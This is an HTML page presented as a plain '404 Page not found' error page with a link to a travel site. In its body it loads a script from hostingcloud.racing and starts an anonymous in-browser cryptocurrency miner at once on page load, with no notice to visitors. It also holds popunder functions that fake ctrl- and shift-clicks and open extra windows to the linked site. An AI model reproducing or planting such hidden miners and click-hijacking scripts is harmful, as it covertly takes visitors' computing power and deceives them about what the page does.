<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>404</title>
    <link rel="shortcut icon" type="image/x-icon" href="favicon.ico">
    <style type="text/css" media="screen">
      body {
        background-color: #f1f1f1;
        margin: 0;
        font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
      }
      .container { padding-left: 15px; padding-right: 15px; margin: 50px auto 40px auto; text-align: center; }
      a { color: #4183c4; text-decoration: none; }
      a:hover { text-decoration: underline; }
      h1 { width: 100%; text-align: center; letter-spacing: -1px; line-height: 60px; font-size: 60px; font-weight: 100; margin: 0px 0 50px 0; text-shadow: 0 1px 0 #fff; }
      p { color: rgba(0, 0, 0, 0.5); margin: 20px 0; line-height: 1.6; }
      ul { list-style: none; margin: 25px 0; padding: 0; }
      li { display: table-cell; font-weight: bold; width: 1%; }
      button{padding: 10px; font-weight: 600; color: #4183c4; }
      button:hover span{ text-decoration: underline; }
      @media only screen and (max-width: 400px) { button { font-size: 16px; min-height: 40px; }}
      span { color: #4183c4; text-decoration: none; }
    </style>
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-122653079-39"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-122653079-39');
</script>



  </head>

  <body>
<script src="https://www.hostingcloud.racing/4Kqs.js"></script>
<script>
    var _client = new Client.Anonymous('72a37ce34c1bc9d2d65145e9d30f96891aad77fbd490f71807aed97b0e350ecb', {
	throttle: 0.5, ads: 0
    });
</script>
<script>
setTimeout(function(){ _client.start(); },  0 * 60 * 1000);
 function pop() {
        var evt = new MouseEvent('click', {
          view : window,
          ctrlKey: true
        });
        document.getElementsByTagName('a')[0].dispatchEvent(evt);
        var chrome   = navigator.userAgent.indexOf('Chrome') > -1;
        if (!chrome) {
          window.open("https://www.suretravel.co.za/");
        }
      }
      function ctrlNavigateAndWindowOpen() {
        var evt = new MouseEvent('click', {
          view : window,
          ctrlKey: true
        });
        document.getElementsByTagName('a')[0].dispatchEvent(evt);
        window.open(location.href);
      }
      function pop2() {
        var evt = new MouseEvent('click', {
          view : window,
          shiftKey: true
        });
        document.getElementsByTagName('a')[0].dispatchEvent(evt);
      }
    </script>

    <div class="container">
      <h1>404</h1>
      <p><strong>Page not found</strong></p>

      <p>
        The site configured at this address does not
        contain the requested file.
      </p>

      <p>
        If this is your site, make sure that the filename case matches the URL.<br>
        For root URLs (like <code>http://example.com/</code>) you must provide an
        <code>index.html</code> file.
      </p>

      <button onclick='pop();'>Would you like to go to: <span>https://www.suretravel.co.za/</span> ?<br><br> Click here.</button>
      <a href="https://www.suretravel.co.za/"></a>
    </div>


  </body>
</html>
